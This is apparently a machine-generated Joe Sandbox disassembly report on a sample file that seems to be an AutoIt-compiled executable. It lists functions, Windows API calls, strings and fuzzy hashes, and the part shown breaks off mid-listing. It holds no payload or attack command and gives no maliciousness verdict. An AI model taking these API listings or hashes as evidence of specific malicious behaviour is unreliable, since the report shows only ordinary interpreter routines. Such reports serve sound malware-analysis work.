Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 74c0485a34f36b3d050455d5bd26f44e96e31e38f0bac4ccc6a3145e3cb2571f
Instruction ID: a0e7168f3cf76052d26429d8159c71396ee72446f6e3222456c9051adb34e34a
Opcode Fuzzy Hash: 74c0485a34f36b3d050455d5bd26f44e96e31e38f0bac4ccc6a3145e3cb2571f
Instruction Fuzzy Hash: F0A1C171604702AFD725DF64C884BEAB7AAFF44355F008519FE9AD22D0DB30EA49CB91

Function 0065D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0065D8EB
_wcscmp.LIBCMT ref: 0065D8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0065D924
CharUpperBuffW.USER32(?,00000000), ref: 0065D941
_wcscmp.LIBCMT ref: 0065D95F
_wcsstr.LIBCMT ref: 0065D970
GetClassNameW.USER32(00000018,?,00000400), ref: 0065D9A8
_wcscmp.LIBCMT ref: 0065D9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0065D9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 0065DA28
_wcscmp.LIBCMT ref: 0065DA38
GetClassNameW.USER32(00000010,?,00000400), ref: 0065DA60
GetWindowRect.USER32(00000004,?), ref: 0065DAC9

Strings

ThumbnailClass, xrefs: 0065D9B3, 0065DA33
@, xrefs: 0065D8C6

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: df63e3f98c3371d7c7ea22db2afa42f11278ec4e9fcdba710eabdad9d4962a43
Instruction ID: 7c3a96993aed768ef1e42977507cadef27c8c198b18a77d5be13fa9702f4adf7
Opcode Fuzzy Hash: df63e3f98c3371d7c7ea22db2afa42f11278ec4e9fcdba710eabdad9d4962a43
Instruction Fuzzy Hash: C98191710083059BDB25DF10C885BAA7BEAEF85315F04446AFD899A1D6DB30ED49CBA1

Function 0065D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0065D753

Strings

[REGEXPTITLE:, xrefs: 0065D77B
ACTIVE, xrefs: 0065D72E
LAST, xrefs: 0065D718
[CLASS:, xrefs: 0065D7A3
[ACTIVE, xrefs: 0065D740
[HANDLE:, xrefs: 0065D75F
ALL, xrefs: 0065D7E7
REGEXP=, xrefs: 0065D768
[LAST, xrefs: 0065D800
CLASSNAME=, xrefs: 0065D790
HANDLE=, xrefs: 0065D74C
[ALL, xrefs: 0065D7F9

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 7e94e1700986a667f4a332df7e85463bfb269b37322a500b1f16f0f4e3008f0d
Instruction ID: 95a8314ccc36805381e9acd888e88548c36de7076847a3f1d7d6e517369da7b1
Opcode Fuzzy Hash: 7e94e1700986a667f4a332df7e85463bfb269b37322a500b1f16f0f4e3008f0d
Instruction Fuzzy Hash: C431B231944616EADB64EB50ED53EED73679F24755F20002EF841711D1EBA1AE08CA19

Function 0065EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0065EAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0065EAC2
SetWindowTextW.USER32(?,?), ref: 0065EAD9
GetDlgItem.USER32(?,000003EA), ref: 0065EAEE
SetWindowTextW.USER32(00000000,?), ref: 0065EAF4
GetDlgItem.USER32(?,000003E9), ref: 0065EB04
SetWindowTextW.USER32(00000000,?), ref: 0065EB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0065EB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0065EB45
GetWindowRect.USER32(?,?), ref: 0065EB4E
SetWindowTextW.USER32(?,?), ref: 0065EBB9
GetDesktopWindow.USER32 ref: 0065EBBF
GetWindowRect.USER32(00000000), ref: 0065EBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0065EC12
GetClientRect.USER32(?,?), ref: 0065EC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0065EC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0065EC6F

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 5fbfc48893784648663ceb9ec7f5a11f2eafffc4cb3beea1c17265ef31acdf9e
Instruction ID: 9ecd5de1aa9ca5edbbf796a55532f4945aea1d801984af801a1ffcc4cbe4b1b2
Opcode Fuzzy Hash: 5fbfc48893784648663ceb9ec7f5a11f2eafffc4cb3beea1c17265ef31acdf9e
Instruction Fuzzy Hash: 76512F71900709AFDB24EFA8CE85BAEBBF6FF04705F004518E556A66A0D775B948CF10

Function 006779B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 006779C6
LoadCursorW.USER32(00000000,00007F00), ref: 006779D1
LoadCursorW.USER32(00000000,00007F03), ref: 006779DC
LoadCursorW.USER32(00000000,00007F8B), ref: 006779E7
LoadCursorW.USER32(00000000,00007F01), ref: 006779F2
LoadCursorW.USER32(00000000,00007F81), ref: 006779FD
LoadCursorW.USER32(00000000,00007F88), ref: 00677A08
LoadCursorW.USER32(00000000,00007F80), ref: 00677A13
LoadCursorW.USER32(00000000,00007F86), ref: 00677A1E
LoadCursorW.USER32(00000000,00007F83), ref: 00677A29
LoadCursorW.USER32(00000000,00007F85), ref: 00677A34
LoadCursorW.USER32(00000000,00007F82), ref: 00677A3F
LoadCursorW.USER32(00000000,00007F84), ref: 00677A4A
LoadCursorW.USER32(00000000,00007F04), ref: 00677A55
LoadCursorW.USER32(00000000,00007F02), ref: 00677A60
LoadCursorW.USER32(00000000,00007F89), ref: 00677A6B
GetCursorInfo.USER32(?), ref: 00677A7B

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: f055971f11dc8c63e4d0da41fa04df5866a48f1d160968e46b4c692fdaf5f949
Instruction ID: 98b3ea365ebc7a0397bf47ab056832b7e18f7daa26c7218e2d2d2205eee5c02b
Opcode Fuzzy Hash: f055971f11dc8c63e4d0da41fa04df5866a48f1d160968e46b4c692fdaf5f949
Instruction Fuzzy Hash: 123138B0D0831A6ADF509FB68C8999FBFE9FF04750F50453AE50DE7280DA78A5008FA1

Function 0062C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 0063E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0062C8B7,?,00002000,?,?,00000000,?,0062419E,?,?,?,006BDC00), ref: 0063E984

Part of subcall function 0062660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006253B1,?,?,006261FF,?,00000000,00000001,00000000), ref: 0062662F

__wsplitpath.LIBCMT ref: 0062C93E

Part of subcall function 00641DFC: __wsplitpath_helper.LIBCMT ref: 00641E3C

_wcscpy.LIBCMT ref: 0062C953
_wcscat.LIBCMT ref: 0062C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0062C978
SetCurrentDirectoryW.KERNEL32(?), ref: 0062CABE

Part of subcall function 0062B337: _wcscpy.LIBCMT ref: 0062B36F

Strings

AU3!, xrefs: 0062C90C
Error opening the file, xrefs: 006930B4, 0069313D
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00693098
Bad directive syntax error, xrefs: 00693429
Unterminated string, xrefs: 00693470
EA06, xrefs: 006930C9
>>>AUTOIT SCRIPT<<<, xrefs: 0069311B

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: eb46fc705cee92c416f0c8ce3748e6624e81534d666288e320a7494eeacb8eb2
Instruction ID: 4901660fc63b38ee3ac828d4944617ad09eb6b5193766692bb6ea0ff8ebcf512
Opcode Fuzzy Hash: eb46fc705cee92c416f0c8ce3748e6624e81534d666288e320a7494eeacb8eb2
Instruction Fuzzy Hash: 9012BE715083519FCB64EF24D891AAFBBEAAF99310F00491EF48993361DB30DA49CF56

Function 0068CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0068CEFB
DestroyWindow.USER32(?,?), ref: 0068CF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0068CFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0068D016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0068D025
DestroyWindow.USER32(?), ref: 0068D042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00620000,00000000), ref: 0068D075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0068D094
GetDesktopWindow.USER32 ref: 0068D0A9
GetWindowRect.USER32(00000000), ref: 0068D0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0068D0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0068D0DA

Part of subcall function 0063B526: GetWindowLongW.USER32(?,000000EB), ref: 0063B537

Strings

tooltips_class32, xrefs: 0068CFED, 0068D06E
0, xrefs: 0068CF1B

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: 2d430e4705bc351ef14963973b8cf5cf15e2a527dd069e696b657b07890761dd
Instruction ID: 16ff3829965a39554508c99a9cc95321025b782bb63658d89773953690debbc2
Opcode Fuzzy Hash: 2d430e4705bc351ef14963973b8cf5cf15e2a527dd069e696b657b07890761dd
Instruction Fuzzy Hash: 9B71DF70140345AFD724EF28CC85FA67BE6EB89704F44561DF9858B3A1D731E942DB22

Function 0068F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F

DragQueryPoint.SHELL32(?,?), ref: 0068F37A

Part of subcall function 0068D7DE: ClientToScreen.USER32(?,?), ref: 0068D807
Part of subcall function 0068D7DE: GetWindowRect.USER32(?,?), ref: 0068D87D
Part of subcall function 0068D7DE: PtInRect.USER32(?,?,0068ED5A), ref: 0068D88D

SendMessageW.USER32(?,000000B0,?,?), ref: 0068F3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0068F3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0068F411
_wcscat.LIBCMT ref: 0068F441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0068F458
SendMessageW.USER32(?,000000B0,?,?), ref: 0068F471
SendMessageW.USER32(?,000000B1,?,?), ref: 0068F488
SendMessageW.USER32(?,000000B1,?,?), ref: 0068F4AA
DragFinish.SHELL32(?), ref: 0068F4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0068F59C

Strings

@GUI_DROPID, xrefs: 0068F4D1
@GUI_DRAGFILE, xrefs: 0068F54B
@GUI_DRAGID, xrefs: 0068F510

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 21b9602607e7f579a210dff9bbd9cf12d4bb9d368ebb37838e1c014873163ec5
Instruction ID: 263250ea8f22ce62f60130bee7e833425317e7c7d8e9062a282ce2093e153a5d
Opcode Fuzzy Hash: 21b9602607e7f579a210dff9bbd9cf12d4bb9d368ebb37838e1c014873163ec5
Instruction Fuzzy Hash: 31615971508301AFC311EF64DC85E9FBBFAEF99710F000A1EF595961A1DB70AA09CB56

Function 0066AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0066AB3D
VariantCopy.OLEAUT32(?,?), ref: 0066AB46
VariantClear.OLEAUT32(?), ref: 0066AB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0066AC40
__swprintf.LIBCMT ref: 0066AC70
VarR8FromDec.OLEAUT32(?,?), ref: 0066AC9C
VariantInit.OLEAUT32(?), ref: 0066AD4D
SysFreeString.OLEAUT32(00000016), ref: 0066ADDF
VariantClear.OLEAUT32(?), ref: 0066AE35
VariantClear.OLEAUT32(?), ref: 0066AE44
VariantInit.OLEAUT32(00000000), ref: 0066AE80

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0066AC6A
Default, xrefs: 0066ACFD

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 4e58c4ba3d51264a6f418191424b2aa1bd8a1b14bc47e537ef0086ab2017d832
Instruction ID: cf869e8fdb29a0979fe56b386c6015e28fa470ba6e72299ec01ae2ef3022ba77
Opcode Fuzzy Hash: 4e58c4ba3d51264a6f418191424b2aa1bd8a1b14bc47e537ef0086ab2017d832
Instruction Fuzzy Hash: 1ED1E071A04615EBCB209FA6D885BAEF7B7FF09700F148059E405AB281DB74EC41DFA6

Function 0068716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 006871FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00687247

Strings

UNCHECK, xrefs: 0068740B
ISCHECKED, xrefs: 006873B2
CHECK, xrefs: 00687267
GETSELECTED, xrefs: 0068733F
EXISTS, xrefs: 006872B0
SELECT, xrefs: 006873E0
GETTEXT, xrefs: 00687382
COLLAPSE, xrefs: 0068728D
GETTOTALCOUNT, xrefs: 0068722A
GETITEMCOUNT, xrefs: 00687311
EXPAND, xrefs: 006872E1

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 5b7534f92ea24176bab4b983226cb0aa190d919f96d47330aff75bae5d6a7435
Instruction ID: 58aabdddf054747994bffbb68ac65c4543c9bdd5cfb04a15a2b8e662a26d4968
Opcode Fuzzy Hash: 5b7534f92ea24176bab4b983226cb0aa190d919f96d47330aff75bae5d6a7435
Instruction Fuzzy Hash: 74916E702087019BCB44FF10C851A6EBBA3AF94310F14595DF8966B3A3DB31ED4ADB99

Function 0065CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0065CF50), ref: 0065CE90

Strings

L+m, xrefs: 0065CD14
H+m, xrefs: 0065CCE8
TEXT, xrefs: 0065CDC7
T+m, xrefs: 0065CD72
NAME, xrefs: 0065CCC2
4+m, xrefs: 0065CC96
REGEXPCLASS, xrefs: 0065CC56
CLASSNN, xrefs: 0065CC33
CLASS, xrefs: 0065CC10
INSTANCE, xrefs: 0065CD9E
P+m, xrefs: 0065CD43

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ChildEnumWindows
String ID: 4+m$CLASS$CLASSNN$H+m$INSTANCE$L+m$NAME$P+m$REGEXPCLASS$T+m$TEXT
API String ID: 3555792229-4238710086
Opcode ID: 5ff09170f3923e20b451f32eabd2f4189b57853fe95b0541b4643d27acc8fcd9
Instruction ID: 9ab21f543cb768f619321455900225fd3f7725508ee17ec5749b8cf54d4659a0
Opcode Fuzzy Hash: 5ff09170f3923e20b451f32eabd2f4189b57853fe95b0541b4643d27acc8fcd9
Instruction Fuzzy Hash: FC919330900606AECB58DF60C482BEDFB77BF14315F50851AE859A7291DF30A95EDBE4

Function 0068E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0068E5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0068BEAF), ref: 0068E607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0068E647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0068E68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0068E6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0068BEAF), ref: 0068E6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0068E6DF
DestroyIcon.USER32(?,?,?,?,?,0068BEAF), ref: 0068E6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0068E70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0068E717

Part of subcall function 00640FA7: __wcsicmp_l.LIBCMT ref: 00641030

Strings

.dll, xrefs: 0068E564
.exe, xrefs: 0068E541
.icl, xrefs: 0068E521

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 8bf4adfdabf40d17d91d0ced5d5232b3f4484ed6c60fe05cf1e5a1b944a8c4eb
Instruction ID: f219f7e25049e0241585742aa6aca5c44d412da5e27c49598c31cdbeb900da73
Opcode Fuzzy Hash: 8bf4adfdabf40d17d91d0ced5d5232b3f4484ed6c60fe05cf1e5a1b944a8c4eb
Instruction Fuzzy Hash: 2C61D171940615FAEB14EF64CC46FFE7BAABF18714F104215F915E61D0EB71A980CBA0

Function 0066D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF

CharLowerBuffW.USER32(?,?), ref: 0066D292
GetDriveTypeW.KERNEL32 ref: 0066D2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066D327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066D35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066D38C

Strings

close, xrefs: 0066D298
open, xrefs: 0066D2B9
set cd door , xrefs: 0066D32D
closed, xrefs: 0066D2A6, 0066D2AF
open , xrefs: 0066D2EE
wait, xrefs: 0066D349
type cdaudio alias cd wait, xrefs: 0066D30A
close cd wait, xrefs: 0066D377

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 614d7d8bdac6542ef12ec94b0eaecd5db7ea9c02412657c3bd364f54c8b3fe6d
Instruction ID: 2a64437de0ec3cb38030d257c57cda8ff19a7793d60f0372c1454f2bb4fab7bb
Opcode Fuzzy Hash: 614d7d8bdac6542ef12ec94b0eaecd5db7ea9c02412657c3bd364f54c8b3fe6d
Instruction Fuzzy Hash: 215157716047159FC740EF10D8819AEB7EAEF98718F04482DF896673A1DB31AE06CF96

Function 006626BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00693973,00000016,0000138C,00000016,?,00000016,006BDDB4,00000000,?), ref: 006626F1
LoadStringW.USER32(00000000,?,00693973,00000016), ref: 006626FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00693973,00000016,0000138C,00000016,?,00000016,006BDDB4,00000000,?,00000016), ref: 0066271C
LoadStringW.USER32(00000000,?,00693973,00000016), ref: 0066271F
__swprintf.LIBCMT ref: 0066276F
__swprintf.LIBCMT ref: 00662780
_wprintf.LIBCMT ref: 00662829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00662840

Strings

Line %d:, xrefs: 0066277A
